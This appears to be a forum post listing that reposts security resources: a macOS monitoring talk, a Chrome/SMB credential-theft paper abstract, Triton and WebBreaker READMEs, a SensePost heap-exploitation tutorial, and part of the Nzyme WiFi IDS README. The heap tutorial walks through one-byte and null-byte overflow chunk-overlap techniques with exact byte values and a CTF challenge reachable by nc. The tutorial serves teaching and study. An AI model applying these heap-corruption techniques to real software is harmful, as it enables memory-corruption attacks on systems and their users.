-
Posts
18772 -
Joined
-
Last visited
-
Days Won
730
Everything posted by Nytro
-
MacOS host monitoring - the open source way Michael George Derbycon 2017 MacOS host monitoring - the open source way, I will talk about a example piece of malware(Handbrake/Proton) and how you can use open source tooling detection tooling to do detection and light forensics. Since I will be talking about the handbrake malware, I will also be sharing some of the TTPs the malware used if you want to find this activity in your fleet. Dropbox - Security Engineer. I work on the Incident Response team at Dropbox. I primarily work on host-based detection systems. Sursa: http://www.irongeek.com/i.php?page=videos/derbycon7/s30-macos-host-monitoring-the-open-source-way-michael-george
-
Stealing Windows Credentials Using Google Chrome Author/Researcher: Bosko Stankovic (bosko defensecode.com) http://www.defensecode.com Attacks that leak authentication credentials using the SMB file sharing protocol on Windows OS are an ever-present issue, exploited in various ways but usually limited to local area networks. One of the rare research involving attacks over the internet was recently presented by Jonathan Brossard and Hormazd Billimoria at the Black Hat security conference[1] [2] in 2015. However, there have been no publicly demonstrated SMB authentication related attacks on browsers other than Internet Explorer and Edge in the past decade. This paper describes an attack which can lead to Windows credentials theft, affecting the default configuration of the most popular browser in the world today, Google Chrome, as well as all Windows versions supporting it. Download: https://www.exploit-db.com/docs/42015.pdf
-
- 1
-
-
Triton is a dynamic binary analysis (DBA) framework. It provides internal components like a Dynamic Symbolic Execution (DSE) engine, a Taint Engine, AST representations of the x86 and the x86-64 instructions set semantics, SMT simplification passes, an SMT Solver Interface and, the last but not least, Python bindings. Based on these components, you are able to build program analysis tools, automate reverse engineering and perform software verification. As Triton is still a young project, please, don't blame us if it is not yet reliable. Open issues or pull requests are always better than troll =). A full documentation is available on our doxygen page. Quick start Description Installation Examples Presentations and Publications Internal documentation Dynamic Symbolic Execution Symbolic Execution Optimizations AST Representations of Semantics SMT Semantics Supported SMT Solver Interface SMT Simplification Passes Spread Taint Tracer Independent Python Bindings News A blog is available and you can follow us on twitter @qb_triton or via our RSS feed. Support IRC: #qb_triton@freenode Mail: triton at quarkslab com Authors Jonathan Salwan - Lead dev, Quarkslab Pierrick Brunet - Core dev, Quarkslab Florent Saudel - Core dev, Bordeaux University Romain Thomas - Core dev, Quarkslab Cite Triton @inproceedings{SSTIC2015-Saudel-Salwan, author = {Florent Saudel and Jonathan Salwan}, title = {Triton: A Dynamic Symbolic Execution Framework}, booktitle = {Symposium sur la s{\'{e}}curit{\'{e}} des technologies de l'information et des communications, SSTIC, France, Rennes, June 3-5 2015}, publisher = {SSTIC}, pages = {31--54}, year = {2015}, } Sursa: https://github.com/JonathanSalwan/Triton
-
- 2
-
-
Introduction Build functional security testing, into your software development and release cycles! WebBreaker provides the capabilities to automate and centrally manage Dynamic Application Security Testing (DAST) as part of your DevOps pipeline. WebBreaker truly enables all members of the Software Security Development Life-Cycle (SDLC), with access to security testing, greater test coverage with increased visibility by providing Dynamic Application Security Test Orchestration (DASTO). Current support is limited to the World's most popular commercial DAST product, WebInspect. System Architecture Supported Features Command-line (CLI) scan administration of WebInspect with Foritfy SSC products. Jenkins Environmental Variable & String Parameter support (i.e. $BUILD_TAG) Docker container v17.x support Custom email alerting or notifications for scan launch and completion. Extensible event logging for scan administration and results. WebInspect REST API support for v9.30 and later. Fortify Software Security Center (SSC) REST API support for v16.10 and later. WebInspect scan cluster support between two (2) or greater WebInspect servers/sensors. Capabilities for extensible scan telemetry with ELK and Splunk. GIT support for centrally managing WebInspect scan configurations. Replaces most functionality of Fortify's fortifyclient Python compatibility with versions 2.x or 3.x Provides AES 128-bit key management for all secrets from the Fernet encryption Python library. Quick Local Installation and Configurations Installing WebBreaker from source: git clone https://github.com/target/webbreaker pip install -r requirements.txt python setup.py install Configuring WebBreaker: Point WebBreaker to your WebInspect API server(s) by editing: webbreaker/etc/webinspect.ini Point WebBreaker to your Fortify SSC URL by editing: webbreaker/etc/fortify.ini SMTP settings on email notifications and a message template can be edited in webbreaker/etc/email.ini Mutually exclusive remote GIT repos created by users, are encouraged to persist WebInspect settings, policies, and webmacros. Simply, add the GIT URL to the webinspect.ini and their respective directories. NOTES: Required: As with any Python application that contains library dependencies, pip is required for installation. Optional: Include your Python site-packages, if they are not already in your $PATH with export PATH=$PATH:$PYTHONPATH. Usage WebBreaker is a command-line interface (CLI) client. See our complete WebBreaker Documentation for further configuration, usage, and installation. The CLI supports upper-level and lower-level commands with respective options to enable interaction with Dynamic Application Security Test (DAST) products. Currently, the two Products supported are WebInspect and Fortfiy (more to come in the future!!) Below is a Cheatsheet of supported commands to get you started. List all WebInspect scans: webbreaker webinspect list --server webinspect-1.example.com:8083 Query WebInspect scans: webbreaker webinspect list --server webinspect-1.example.com:8083 --scan_name important_site List with http: webbreaker webinspect list --server webinspect-1.example.com:8083 --protocol http Download WebInspect scan from server or sensor: webbreaker webinspect download --server webinspect-2.example.com:8083 --scan_name important_site_auth Download WebInspect scan as XML: webbreaker webinspect download --server webinspect-2.example.com:8083 --scan_name important_site_auth -x xml Download WebInspect scan with http (no SSL): webbreaker webinspect download --server webinspect-2.example.com:8083 --scan_name important_site_auth --protocol http Basic WebInspect scan: webbreaker webinspect scan --settings important_site_auth Advanced WebInspect Scan with Scan overrides: webbreaker webinspect scan --settings important_site_auth --allowed_hosts example.com --allowed_hosts m.example.com Scan with local WebInspect settings: webbreaker webinspect scan --settings /Users/Matt/Documents/important_site_auth Initial Fortify SSC listing with authentication (SSC token is managed for 1-day): webbreaker fortify list --fortify_user matt --fortify_password abc123 Interactive Listing of all Fortify SSC application versions: webbreaker fortify list List Fortify SSC versions by application (case sensitive): webbreaker fortify list --application WEBINSPECT Upload to Fortify SSC with command-line authentication: webbreaker fortify upload --fortify_user $FORT_USER --fortify_password $FORT_PASS --version important_site_auth Upload to Fortify SSC with interactive authentication & application version configured with fortify.ini: webbreaker fortify upload --version important_site_auth --scan_name auth_scan Upload to Fortify SSC with application/project & version name: webbreaker fortify upload --application my_other_app --version important_site_auth --scan_name auth_scan WebBreaker Console Output webbreaker webinspect scan --settings MyCustomWebInspectSetting --scan_policy Application --scan_name some_scan_name _ __ __ ____ __ | | / /__ / /_ / __ )________ ____ _/ /_____ _____ | | /| / / _ \/ __ \/ __ / ___/ _ \/ __ `/ //_/ _ \/ ___/ | |/ |/ / __/ /_/ / /_/ / / / __/ /_/ / ,< / __/ / |__/|__/\___/_.___/_____/_/ \___/\__,_/_/|_|\___/_/ Version 1.2.0 JIT Scheduler has selected endpoint https://some.webinspect.server.com:8083. WebInspect scan launched on https://some.webinspect.server.com:8083 your scan id: ec72be39-a8fa-46b2-ba79-10adb52f8adb !! Scan results file is available: some_scan_name.fpr Scan has finished. Webbreaker complete. Bugs and Feature Requests Found something that doesn't seem right or have a feature request? Please open a new issue. Copyright and License Copyright 2017 Target Brands, Inc. Licensed under MIT. Sursa: https://github.com/target/webbreaker
-
- 1
-
-
Linux Heap Exploitation Intro Series: The magicians cape – 1 Byte Overflow Reading time ~21 min Posted by javier on 20 September 2017 Categories: Heap, Heap linux, Heap overflow Intro Hello again! It’s been a while since the last blog post. This is due to not having as much time as we wanted but hopefully you all kept the pace with this heapy things as they are easy to forget due to the heavy amount of little details the heap involves. On this post we are going to demonstrate how a single byte overflow, with a user controlled value, can cause chunks to disappear for the implementation like a magician puts a cape on top of objects (chunks) and makes them disappear. The Vulnerability Preface For the second part of our series we are going for another rather common vulnerability happening out there. From my own experience, it sometimes confusing and hard to get the sizes right for elements (be it arrays, allocations, variables in general) because of the confusion between declaring “something” and actually accessing each element (i.e. byte) of that “something”. I know, sounds weird, but look at the following code: int array_of_integers[10]; // (1) int i; for (i = 1; i <= 10; i++) // (2) { array_of_integers[i] = 1; // (3) } In this code, we wanted to have an array of ten integers (1) and then iterate over the array (2) and set every element of the array to the number 1. As you might or might not know, the first element of an array is not the number one, in C, these start with zero (array_of_integers[0]). What will happen here is that when the variable i reaches 10, the code will try to write to array_of_integers[10] which is not allocated, effectively doing out-of-bounds write, exactly 4 bytes more than expected as 4 bytes is the size of an int. Also, keeping the pace up with ptmalloc2 implementation and to keep these blog posts as “fresh” and “new” as possible, here we have a fairly new exploit against SAPCAR (CVE-2017-8852) by CoreSecurity that takes advantage of a buffer overflow happening in the heap. It’s an easy and cool read! What This kind of vulnerability falls into the category of buffer overflows or out-of-bounds. Specifically in this blog post we are going to see what could happen in the case of an out-of-bounds 1 byte write. At first glance one could think there is not many possibilities on just writing one byte but, if we remember how an allocated chunk is placed into memory we begin to “believe”: +-+-+-+-+-+-+-+-+-+-+-+-+ | PREV_SIZE OR USER DATA| <-- Previous Chunk Data (OVERFLOW HERE) +-----------------+-+-+-+ <-- Chunk start | CHUNK SIZE |A|M|P| +-----------------+-+-+-+ | USER DATA | | | | - - - - - - - -| | PREV_SIZE OR USER DATA| +-----------------------+ <-- End of chunk As we can see, 1 byte overwrite will mess up the Main Arena (A), Is MMaped (M) and Previous in-use (P) bits as well as overwriting the first byte of the CHUNK SIZE. The implications of this type of vulnerability (cliché) are endless: changing the previous in-use bit leading to strange memory corruptions that when free()‘ing, maliciously crafted memory, would lead to arbitrary overwrite (overwriting pointers to functions), shrinking or growing adjacent chunks by tampering with the next chunk’s size thus leading to chunks overlapping or memory fragmentation which would lead to use-after-invalidation bugs (memory leaks, use-after-free, etc.). When stars collide one byte To prepare the scenario for this kind of vulnerability, I inspired myself heavily on the Forgotten Chunks[1] paper by Context. I took my own way in the sense that I decided to build two proof of concepts for the techniques described there as well as a challenge for you to test out! One byte write In this scenario we count with the following: There are three allocated chunks and the first of them A, is the vulnerable one to our one byte overflow. To simplify things; we can write into the first two chunks A and B but not into the third chunk C. We can read from all of them. Let’s see the initial state of the heap of this in our beloved chunky-ascii-art. +---HEAP GROWS UPWARDS | | +-+-+-+-+-+-+ | | CHUNK A | <-- Read/Write | +-----------+ | | CHUNK B | <-- Read/Write | +-----------+ | | CHUNK C | <-- Read | +-----------+ | | TOP | | | | V | | +-----------+ Our goal is to write into chunk C. To do so we would need the following to happen. 1 – Previous to any overflows and to prevent memory corruptions because we are going to overflow into chunk B, the first thing to make happen is to free() chunk B. +---HEAP GROWS UPWARDS | | +-+-+-+-+-+-+ | | CHUNK A | <-- Read/Write | +-----------+ | | FREE B | | +-----------+ | | CHUNK C | <-- Read | +-----------+ | | TOP | | | | V | | +-----------+ 2 – Now that chunk B is free, we are going to trigger the one byte overflow that is present in chunk A and overflow one byte into chunk B. This will change the first byte of chunk’s B size – in our case, we will make it grow. Let’s say that our chunks are of the following sizes: A(0x100-WORD_SIZE), B(0x100-WORD_SIZE), C(0x40-WORD_SIZE) Let me state that WORD_SIZE is a variable that will be 8 on 64bit systems and 4 on 32bit systems. This was already explained in the Painless Intro to ptmalloc2 blog post but again: This WORD_SIZE is subtracted from the size we actually want because it is the size that the chunk’s size header will take in memory so, to keep the chunks within the size we expect (0x100 or 0x40) we subtract the size header’s size (WORD_SIZE) to prevent padding to the next WORD_SIZE*2 size. I know this is too condensed but it is a must to be able to understand this to proceed. By now we can see where all this goes, right? That’s it, we are about to overwrite chunk’s B size to make it be as big enough to have B+C size. So, we know that B is 0x100 and C is 0x40, then let me ask you a question: With which byte would we need to overflow A so that it puts it into B‘s size to completely overlap C on a 64bit system? a) 0x40 0x41 c) 0x48 That’s right, none of them. We shouldn’t be choosing values ending in zero or an even number because all of these, in binary, translate to leaving the last bit unset. This means that the PREV_INUSE bit will be set to zero creating a memory corruption in some cases as chunk A is not really free. That leaves 0x40 and 0x48 out. If you have chosen 0x48, you might know the reason why 0x41 is not valid to completely overlap C: Because we need to add 8 bytes due to C‘s size header length placed just after B. The right answer is 0x51 as it keeps the PREV_INUSE bit set and is the next 16 byte padded size to 0x40. Enough chit-chat, but it was necessary. Remember that B is free()‘d, so B->fd and B->bk (pointers to next’s and previous free chunks if any) are set as well as the next’s chunk (C) PREV_SIZE: -=Data gets populated from right to left and from top to bottom=- +-----------------+-+-+-+ |CHUNK A SIZE = \x01\x01| <-- Size 0x100 + 0x1 (PREV_INUSE bit) +-----------------+-+-+-+ |x51\x51\x51\x51\x51\x51| |x51\x51\x51\x51\x51\x51| |x51\x51\x51\x51\x51\x51| |x51\x51\x51\x51\x51\x51| +-----------------+-+-+-+ |FREE B SIZE = \x01\x51| <-- Size Overflown 0x151 +-----------------+-+-+-+ |B->fd = main_arena->TOP| |B->bk = main_arena->TOP| +-----------------------+ |PREV_SIZE B = \x01\x01| <-- PREV_SIZE now doesn't match B size +-----------------------+ |CHUNK C SIZE = \x41| <-- 0x100 + 0x1 +-----------------+-+-+-+ | | | | | | | | +-----------------------+ | TOP | <-- B->fd and B->fk point here +-----------------------+ | | | | | | | | +-----------------------+ 3 – Ok! The buffer overflow is triggered now and chunk’s B size has been changed to 0x151. What should happen now to overlap into chunk C? We would need an allocation of a size near to: old B size + C size = 0x100 + 0x40. When the following allocation happens: B = malloc(0x100+0x40); Chunk B will be now overlapping chunk C in its entirety as we can see in the following figure. -=Data gets populated from right to left and from top to bottom=- <--- 8 bytes wide ---> +-----------------+-+-+-+ |CHUNK A SIZE = \x01\x01| +-----------------+-+-+-+ |x51\x51\x51\x51\x51\x51| |x51\x51\x51\x51\x51\x51| |x51\x51\x51\x51\x51\x51| |x51\x51\x51\x51\x51\x51| +-----------------+-+-+-+ |CHUNK B SIZE = \x01\x51| <-- Size Overflown 0x151 +-----------------+-+-+-+ |B->fd = main_arena->TOP| <-- Even if allocated... |B->bk = main_arena->TOP| <-- ...memory isn't cleared and... +-----------------------+ |PREV_SIZE B = \x01\x01| <-- ...values are kept in memory. +-----------------------+ |CHUNK C SIZE = \x41| +-----------------+-+-+-+ | | | | | | | | +-----------------------+ <-- B now takes up to here (1) | TOP | +-----------------------+ | | | | | | | | +-----------------------+ (1) The “mathemata” out there must have spotted that chunk B actually goes 8 bytes into TOP but that is not a problem for us for now. 4 – As a last step, we would just need to write into chunk B at our desired position, effectively achieving our main goal: Writing into chunk C. -=Data gets populated from right to left and from top to bottom=- <--- 8 bytes wide ---> +-----------------+-+-+-+ |CHUNK A SIZE = \x01\x01| +-----------------+-+-+-+ |x51\x51\x51\x51\x51\x51| |x51\x51\x51\x51\x51\x51| |x51\x51\x51\x51\x51\x51| |x51\x51\x51\x51\x51\x51| +-----------------+-+-+-+ |CHUNK B SIZE = \x01\x51| +-----------------+-+-+-+ |x42\x42\x42\x42\x42\x42| <-- Setting all B to hex('B') = '\x42' |x42\x42\x42\x42\x42\x42| +-----------------------+ |x42\x42\x42\x42\x42\x42| +-----------------------+ |x42\x42\x42\x42\x42\x42| +-----------------+-+-+-+ |x42\x42\x42\x42\x42\x42| <-- chunk C got overlapped and written |x42\x42\x42\x42\x42\x42| |x42\x42\x42\x42\x42\x42| |x42\x42\x42\x42\x42\x42| +-----------------------+ | TOP | +-----------------------+ | | | | | | | | +-----------------------+ Cool. If previous to filling all of chunk B with \x42, the “magically disappeared” chunk C gets free()‘d we will be able to leak pointers to main_arena->top by reading the contents of B. Also if C is still used, we can control the data inside it by writing on high positions at B. There are many more possibilities! One null byte write This scenario is initially the same as the previous one except that the sizes are A(0x100), B(0x250) and C(0x100); also, we can only overflow with a null byte \x00. As the first steps are the same as the one byte write, we are going straight into the null byte overflow. Note that this is more likely to happen because in C, all strings must be terminated with the “null byte”. Our goal here is to make the implementation forget about an allocated chunk by overlapping it with free space. 1 – We overflow in the same way as before but what is going to happen is a pretty much different thing than before. We are shrinking the size of chunk B from 0x250 to 0x200. -=Data gets populated from right to left and from top to bottom=- +-----------------+-+-+-+ |CHUNK A SIZE = \x01\x01| <-- Size 0x100 + 0x1 (PREV_INUSE bit) +-----------------+-+-+-+ | EREH OG NAC GNIRTS YNA| <-- ANY STRING CAN GO HERE | EB LLIW TI ESUACEB| <-- BECAUSE IT WILL BE | DETANIMRET LLUN| <-- NULL TERMINATED |AAAAAAAAAAAAAAAAAAAAAAA| +-----------------+-+-+-+ |FREE B SIZE = \x02\x00| <-- Size byte overflown 0x250 --> 0x200 +-----------------+-+-+-+ |B->fd = main_arena->TOP| |B->bk = main_arena->TOP| | | | | <-- Free B ends here now (1) | | | | +-----------------------+ <-- Free space still ends here (2) |PREV_SIZE B = \x02\x50| <-- C PREV_SIZE doesn't match B size +-----------------------+ |CHUNK C SIZE = \x01\x00| <-- PREV_INUSE is zero now. +-----------------+-+-+-+ | | | | +-----------------------+ | TOP | +-----------------------+ | | | | | | | | +-----------------------+ Chunk B has shrunk (1) and this will have its consequences. The first and easiest to see is that chunk’s C PREV_SIZE (remember that this value is used to merge free chunks) is different from the actual chunk’s B size. The second consequence is that for the implementation, the free space between chunk A and chunk C (2) is somewhat “divided” from the implementation’s perspective (it is corrupted already). This consequences together have a third and final consequence. If we allocate two new chunks (J and K) of smaller size than 0x200/2 (0x100)… 2 – … the implementation is going to properly allocate these in the space of chunk B because there is space for two chunks of size, let’s say, 0x80. -=Data gets populated from right to left and from top to bottom=- +-----------------+-+-+-+ |CHUNK A SIZE = \x01\x01| <-- Size 0x100 + 0x1 (PREV_INUSE bit) +-----------------+-+-+-+ | EREH OG NAC GNIRTS YNA| | EB LLIW TI ESUACEB| | DETANIMRET LLUN| |AAAAAAAAAAAAAAAAAAAAAAA| +-----------------+-+-+-+ |CHUNK J SIZE = \x00\x81| +-----------------+-+-+-+ | | | | +-----------------------+ |CHUNK K SIZE = \x00\x81| +-----------------------+ | | | | +-----------------------+ |PREV_SIZE B = \x02\x50| <-- C PREV_SIZE doesn't match B size +-----------------------+ |CHUNK C SIZE = \x01\x00| +-----------------+-+-+-+ | | | | +-----------------------+ | TOP | +-----------------------+ | | | | | | | | +-----------------------+ Not much to explain about two simple allocations. This leads us onto the final part. Can you see which chunk is about to disappear to the implementation (Forgotten Chunk)? 3 – Finally if we free() chunk J and chunk C in that order the unlink macro will kick in and merge both chunks into one free space. So, which chunk is between the cape formed by chunk’s J and C? That’s right, the newly allocated chunk K. First chunk J is free()‘d – note that K‘s PREV_INUSE is zero now due to the previous chunk J being free. -=Data gets populated from right to left and from top to bottom=- +-----------------+-+-+-+ |CHUNK A SIZE = \x01\x01| <-- Size 0x100 + 0x1 (PREV_INUSE bit) +-----------------+-+-+-+ | EREH OG NAC GNIRTS YNA| | EB LLIW TI ESUACEB| | DETANIMRET LLUN| |AAAAAAAAAAAAAAAAAAAAAAA| +-----------------+-+-+-+ |FREE J SIZE = \x00\x81| (3) +-----------------+-+-+-+ |J->fd = main_arena->TOP| |J->bk = main_arena->TOP| +-----------------------+ |CHUNK K SIZE = \x00\x80| +-----------------------+ | | | | +-----------------------+ |PREV_SIZE B = \x02\x50| (2) +-----------------------+ |CHUNK C SIZE = \x01\x00| (1) +-----------------+-+-+-+ | | | | +-----------------------+ | TOP | +-----------------------+ | | | | | | | | +-----------------------+ 4 – Then, we are free()‘ing C. Now pay close attention to the following: – Chunk C PREV_INUSE bit is unset (1) – Chunk C PREV_SIZE is still the old B size 0x250 (2) – Chunk J is also free and at the position of old B (0x250 bytes back from chunk C) (3) They are explained in reverse order because this is exactly how the unlink macro is going over all of them. Check’s that the current free()‘d chunk has its PREV_INUSE bit unset (1), then it proceeds to merge the other free()‘d chunk which is at C – PREV_SIZE = J. Now J and C are merged into one big free space at J. Poor K was in the middle of this merge situation and is now treated as free space – ptmalloc2 forgot about him -=Data gets populated from right to left and from top to bottom=- +-----------------+-+-+-+ |CHUNK A SIZE = \x01\x01| <-- Size 0x100 + 0x1 (PREV_INUSE bit) +-----------------+-+-+-+ | EREH OG NAC GNIRTS YNA| | EB LLIW TI ESUACEB| | DETANIMRET LLUN| |AAAAAAAAAAAAAAAAAAAAAAA| +-----------------+-+-+-+ |FREE J SIZE = \x03\x51| <-- Free size starting here +-----------------+-+-+-+ |J->fd = main_arena->TOP| |J->bk = main_arena->TOP| + - - - - - - - + | CHUNK K FORGOTTEN! | + - - - - - - - + | | | | + - - - - - - - + | | | | | | | | | | | | +-----------------------+ <-- Free size ends here | TOP | +-----------------------+ | | | | | | | | +-----------------------+ Now chunk K is in the new free()‘d area (in green) which again has nearly the same implications as the previous scenario: use-after-invalidation, leaks, arbitrary writes, etc. The playground Let’s go have some fun! As in the previous series I am trying to create a tradition by providing proof of concepts and a challenge! You can get the playground’s code here. Download Playground Code In order to not make this blog post longer than expected, the proof of concepts provided are directly related with the When stars align section. Worry not for I have heavily commented each PoC. But wait! Don’t think I would be that lazy! Here, have some videos and a little explanation. One byte write This PoC is based around on writing to chunk C. An X is written to a point in B after the vulnerability is triggered. This point in chunk B is exactly the previous to last byte in the overlapped C. One null byte write This one corresponds to the second scenario with the difference that instead of creating J and K chunk variables, I have reused the B variable and just added an X variable to hold the fourth chunk. This chunk X is the one to be overlapped and overwritten as we can see in the following video. Now you This second challenge is on 178.62.74.135 on ports 10000, 10001. Your goal is to retrieve the flag by overlapping a chunk that you cannot read directly from – the vulnerable chunk is A! nc 178.62.74.135 10000 -v nc 178.62.74.135 10001 -v The flag is in the form: SP{contents_of_the_flag}. Note that you must send us your exploit source code to be eligible to win! The winner will win a SensePost shirt and will be chosen regarding the following criteria: Originality – Programming Language, code length, formatting, comments, etc. Accurate – Did you do the maths or bruteforced it? Hints – There are 3 allocated chunks already: A(0x100), B(0x100) & C(0x80) – Values with the last 3 bits set can cause weird behaviour – There are hidden easter eggs for those trying to break things further – You can calculate or either brute force it. Your call! – No, you don’t need to solve the 2016 challenge References [1] Glibc Adventures: The Forgotten Chunks Chris Evans/Tavis Ormandis – Single NUL byte overflow Painless intro to the linux userland heap Sursa: https://sensepost.com/blog/2017/linux-heap-exploitation-intro-series-the-magicians-cape-1-byte-overflow/
-
- 1
-
-
Nzyme Introduction Nzyme collects 802.11 management frames directly from the air and sends them to a Graylog (Open Source log management) setup for WiFi IDS, monitoring, and incident response. It only needs a JVM and a WiFi adapter that supports monitor mode. Think about this like a long-term (months or years) distributed Wireshark/tcpdump that can be analyzed and filtered in real-time, using a powerful UI. If you are new to the fascinating space of WiFi security, you might want to read my Common WiFi Attacks And How To Detect Them blog post. What kind of data does it collect? Nzyme collects, parses and forwards all relevant 802.11 management frames. Management frames are unecrypted so anyone close enough to a sending station (an access point, a computer, a phone, a lightbulb, a car, a juice maker, ...) can pick them up with nzyme. Association request Association response Probe request Probe response Beacon Disassociation Authentication Deauthentication What do I need to run it? Everything you need is available from Amazon Prime and is not very expensive. There even is a good chance you have the parts around already. One or more WiFi adapters that support monitor mode on your operating system. The most important component is one (or more) WiFi adapters that support monitor mode. Monitor mode is the special state of a WiFi adapter that makes it read and report all 802.11 frames and not only certain management frames or frames of a network it is connected to. You could also call this mode sniffing mode: The adapter just spits out everything it sees on the channel it is tuned to. The problem is, that many adapter/driver/operating system combinations do not support monitor mode. The internet is full of compatibility information but here are the adapters I run nzyme with on a Raspberry Pi 3 Model B: ALFA AWUS036NH - 2.4Ghz and 5Ghz (Amazon Prime, about $40) ALFA AWUS036NEH - 2.4Ghz (Amazon Prime, about $50) If you have another one that supports monitor mode, you can use that one. Nzyme does by far not require any specific hardware. A small computer to run nzyme on. I recommend to run nzyme on a Raspberry Pi 3 Model B. This is pretty much the reference architecture, because that is what I run it on. In the end, it shoulnd’t really matter what you run it on, but the docs and guides will most likely refer to a Raspberry Pi with a Raspbian on in. A Graylog setup You need a Graylog setup with ah GELF TCP input that is reachable by your nzyme sensors. Channel hopping The 802.11 standard defines many frequencies (channels) a network can operate on. This is useful to avoid contention and bandwidth issues, but also means that your wireless adapter has to be tuned to a single channel. During normal operations, your operating system will do this automatically for you. Because we don’t want to listen on only one, but possibly all WiFi channels, we either need dozens of adapters, with one adapter for each channel, or we cycle over multiple channels on a single adapter rapidly. Nzyme allows you to configure multiple channels per WiFi adapter. For example, if you configure nzyme to listen on channel 1,2,3,4,5,6 on wlan0 and 7,8,9,10,11 on wlan1, it will tune wlan0 to channel 1 for a configurable time (default is 1 second) and then switch to channel 2, then to channel 3 and so on. By doing this, we might miss a bunch of wireless frames but are not missing out on some channels completely. The best configuration depends on your use-case but usually you will want to tune to all 2.4 Ghz and 5 Ghz WiFi channels. On Linux, you can get a list of channels your WiFi adapter supports like this: $ iwlist wlan0 channel wlan0 32 channels in total; available frequencies : Channel 01 : 2.412 GHz Channel 02 : 2.417 GHz Channel 03 : 2.422 GHz Channel 04 : 2.427 GHz Channel 05 : 2.432 GHz Channel 06 : 2.437 GHz Channel 07 : 2.442 GHz Channel 08 : 2.447 GHz Channel 09 : 2.452 GHz Channel 10 : 2.457 GHz Channel 11 : 2.462 GHz Channel 12 : 2.467 GHz Channel 13 : 2.472 GHz Channel 14 : 2.484 GHz Channel 36 : 5.18 GHz Channel 38 : 5.19 GHz Channel 40 : 5.2 GHz Channel 44 : 5.22 GHz Channel 46 : 5.23 GHz Channel 48 : 5.24 GHz Channel 52 : 5.26 GHz Channel 54 : 5.27 GHz Channel 56 : 5.28 GHz Channel 60 : 5.3 GHz Channel 62 : 5.31 GHz Channel 64 : 5.32 GHz Channel 100 : 5.5 GHz Channel 102 : 5.51 GHz Channel 104 : 5.52 GHz Channel 108 : 5.54 GHz Channel 110 : 5.55 GHz Channel 112 : 5.56 GHz Current Frequency:2.432 GHz (Channel 5) Things to keep in mind A few general things to know before you get started: Success will highly depend on how well supported your WiFi adapters and drivers are. Use the recommended adapters for best results. You can get them from Amazon Prime and have them ready in one or two days. At least on OSX, your adapter will not switch channels when already connected to a network. Make sure to disconnect from networks before using nzyme with the on-board WiFi adapter. On other systems, switching to monitor mode should disconnect the adapter from a possibly connected network. Nzyme works well with both the OpenJDK or the Oracle JDK and requires Java 7 or 8. Wifi adapters can draw quite some current and I have seen Raspberry Pi 3’s shut down when connecting more than 3 ALFA adapters. Consider this before buying tons of adapters. Testing on a MacBook (You can skip this and go straight to a real installation on a Raspberry Pi or install it on any other device that runs Java and has supported WiFi adapters connected to it.) Requirements Nzyme is able to put the onboard WiFi adapter of recent MacBooks into monitor mode so you don’t need an external adapter for testing. Remember that you cannot be connected to a wireless network while running nzyme, so the Graylog setup you send data to has to be local or you need a wired network connection or a second WiFi adapter as LAN/WAN uplink. Make sure you have Java 7 or 8 installed: $ java -version java version "1.8.0_121" Java(TM) SE Runtime Environment (build 1.8.0_121-b13) Java HotSpot(TM) 64-Bit Server VM (build 25.121-b13, mixed mode) Download and configure Download the most recent build from the [Releases] page. Create a new file called nzyme.conf in the same folder as your nzyme.jar file: nzyme_id = nzyme-macbook-1 channels = en0:1,2,3,4,5,6,8,9,10,11 channel_hop_command = sudo /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport {interface} channel {channel} channel_hop_interval = 1 graylog_addresses = graylog.example.org:12000 beacon_frame_sampling_rate = 0 Note the graylog_addresses variable that has to point to a GELF TCP input in your Graylog setup. Adapt it accordingly. Please refer to the example config in the repository for a more verbose version with comments. Run After disconnecting from all WiFi networks (you might have to "forget" them in the macOS WiFi settings), you can start nzyme like this: $ java -jar nzyme-0.1.jar -c nzyme.conf 18:35:00.261 [main] INFO horse.wtf.nzyme.Main - Printing statistics every 60 seconds. Logs are in [logs/] and will be automatically rotated. 18:35:00.307 [main] WARN horse.wtf.nzyme.Nzyme - No Graylog uplinks configured. Falling back to Log4j output 18:35:00.459 [main] INFO horse.wtf.nzyme.Nzyme - Building PCAP handle on interface [en0] 18:35:00.474 [main] INFO horse.wtf.nzyme.Nzyme - PCAP handle for [en0] acquired. Cycling through channels <1,2,3,4,5,6,8,9,10,11>. 18:35:00.483 [nzyme-loop-0] INFO horse.wtf.nzyme.Nzyme - Commencing 802.11 frame processing on [en0] ... (⌐■_■)–︻╦╤─ – – pew pew Nzyme is now collecting data and writing it into the Graylog input you configured. A message will look like this: Installation and configuration on a Raspberry Pi 3 Requirements The onboard WiFi chips of recent Raspberry Pi models can be put into monitor mode with the alternative nexmon driver. The problem is, that the onboard antenna is not very good. If possible, use an external adapter that supports monitor mode instead. Make sure you have Java 7 or 8 installed: $ java -version openjdk version "1.8.0_40-internal" OpenJDK Runtime Environment (build 1.8.0_40-internal-b04) OpenJDK Zero VM (build 25.40-b08, interpreted mode) Download and configure Download the most recent build from the [Releases] page. Create a new file called nzyme.conf in the same folder as your nzyme.jar file: nzyme_id = nzyme-sensors-1 channels = wlan0:1,2,3,4,5,6,8,9,10,11,12,13,14|wlan1:36,38,40,44,46,48,52,54,56,60,62,64,100,102,104,108,110,112 channel_hop_command = sudo /sbin/iwconfig {interface} channel {channel} channel_hop_interval = 1 graylog_addresses = graylog.example.org:12000 beacon_frame_sampling_rate = 0 Note the graylog_addresses variable that has to point to a GELF TCP input in your Graylog setup. Adapt it accordingly. Please refer to the example config in the repository for a more verbose version with comments. Run $ java -jar nzyme-0.1.jar -c nzyme.conf 17:28:45.657 [main] INFO horse.wtf.nzyme.Main - Printing statistics every 60 seconds. Logs are in [logs/] and will be automatically rotated. 17:28:51.637 [main] INFO horse.wtf.nzyme.Nzyme - Building PCAP handle on interface [wlan0] 17:28:53.178 [main] INFO horse.wtf.nzyme.Nzyme - PCAP handle for [wlan0] acquired. Cycling through channels <1,2,3,4,5,6,8,9,10,11,12,13,14>. 17:28:53.268 [nzyme-loop-0] INFO horse.wtf.nzyme.Nzyme - Commencing 802.11 frame processing on [wlan0] ... (⌐■_■)–︻╦╤─ – – pew pew 17:28:54.926 [main] INFO horse.wtf.nzyme.Nzyme - Building PCAP handle on interface [wlan1] 17:28:56.238 [main] INFO horse.wtf.nzyme.Nzyme - PCAP handle for [wlan1] acquired. Cycling through channels <36,38,40,44,46,48,52,54,56,60,62,64,100,102,104,108,110,112>. 17:28:56.247 [nzyme-loop-1] INFO horse.wtf.nzyme.Nzyme - Commencing 802.11 frame processing on [wlan1] ... (⌐■_■)–︻╦╤─ – – pew pew Collected frames will now start appearing in your Graylog setup. Note that DEB and RPM packages are in the making and will be released soon. Renaming WiFi interfaces (optional) The interface names wlan0, 